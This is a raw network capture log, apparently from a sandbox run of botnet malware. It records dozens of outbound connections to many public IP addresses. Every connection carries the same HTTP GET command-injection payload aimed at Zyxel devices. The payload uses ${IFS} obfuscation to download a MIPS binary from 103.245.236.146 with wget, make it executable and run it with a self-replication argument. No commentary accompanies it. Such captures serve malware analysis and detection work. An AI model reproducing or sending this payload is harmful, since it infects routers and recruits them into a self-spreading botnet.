                                                        Jan 28, 2024 10:12:53.426718950 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4692192.168.2.144530658.54.107.175443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.426743984 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4693192.168.2.143872213.242.113.198443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.426788092 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4694192.168.2.145834058.200.15.215443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.426836014 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4695192.168.2.144771042.180.170.29443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.426867008 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4696192.168.2.1439348179.183.191.200443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.426911116 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4697192.168.2.1458884210.239.244.44443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.426954031 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4698192.168.2.145357634.124.45.38443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.426996946 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4699192.168.2.1449434168.49.17.199443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.427038908 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4700192.168.2.1441004166.99.185.207443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.427068949 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4701192.168.2.144526866.170.3.132443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.427093983 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4702192.168.2.1440048114.1.152.83443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.427134037 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4703192.168.2.1442606209.116.242.252443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.427167892 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4704192.168.2.1457820151.136.220.135443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.427205086 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4705192.168.2.1454414166.228.125.67443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.427262068 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4706192.168.2.1445812130.61.247.235443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.427313089 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4707192.168.2.145013813.42.183.140443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.427345037 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4708192.168.2.144895697.26.201.7443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.427361965 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4709192.168.2.1453842110.184.24.85443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.427397013 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4710192.168.2.14384389.4.146.179443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.427475929 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4711192.168.2.1439840219.44.132.83443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.427485943 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4712192.168.2.1453296176.95.138.136443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.427521944 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4713192.168.2.145161691.147.247.57443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.427550077 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4714192.168.2.145831875.179.250.43443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.421395063 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4715192.168.2.145189424.51.33.208443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.421576977 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4716192.168.2.1437592178.80.185.34443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.421607971 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4717192.168.2.143559819.224.234.149443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.421646118 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4718192.168.2.144705097.21.23.226443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.421694994 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4719192.168.2.1443266134.120.81.81443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.421745062 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4720192.168.2.145783062.12.69.67443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.421797991 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4721192.168.2.145411486.244.48.197443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.421847105 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4722192.168.2.145368895.125.191.23443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.421907902 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4723192.168.2.1451254175.2.187.220443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.421937943 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4724192.168.2.1459348200.241.175.193443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.421996117 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4725192.168.2.1440730150.240.29.121443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.422041893 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4726192.168.2.143387091.184.218.81443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.422075987 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4727192.168.2.1448730100.176.49.147443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.422132015 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4728192.168.2.1445984121.11.172.254443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.422154903 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4729192.168.2.1448250200.7.142.14443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.422171116 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4730192.168.2.14570721.232.233.218443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.422218084 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4731192.168.2.144974242.215.135.68443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.422270060 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4732192.168.2.144784061.111.38.224443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.422306061 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4733192.168.2.1457438177.17.141.22443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.422346115 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4734192.168.2.145337298.57.18.135443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.422404051 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4735192.168.2.1445278108.3.18.133443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.422430992 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4736192.168.2.145106094.147.241.138443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.422435999 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4737192.168.2.144233219.67.226.155443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.422482967 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4738192.168.2.1438340221.116.118.165443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.422523975 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4739192.168.2.145181444.22.1.108443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.422571898 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4740192.168.2.1438150130.227.94.173443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.422605038 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4741192.168.2.14410449.238.188.208443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.422648907 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4742192.168.2.1435250192.171.149.105443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.422677040 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4743192.168.2.145015058.218.175.4443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.422713041 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4744192.168.2.145963670.139.241.91443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.422746897 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4745192.168.2.1446154113.96.193.108443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.422801018 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4746192.168.2.1454560169.93.214.152443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.422833920 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4747192.168.2.1458342116.156.182.228443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.422856092 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4748192.168.2.146032625.239.8.211443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.422916889 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4749192.168.2.143805077.60.218.101443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.422940016 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4750192.168.2.145618018.56.220.48443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.422988892 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4751192.168.2.1448822217.114.158.205443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.423038960 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4752192.168.2.1453262206.140.1.158443
                                                        TimestampBytes transferredDirectionData
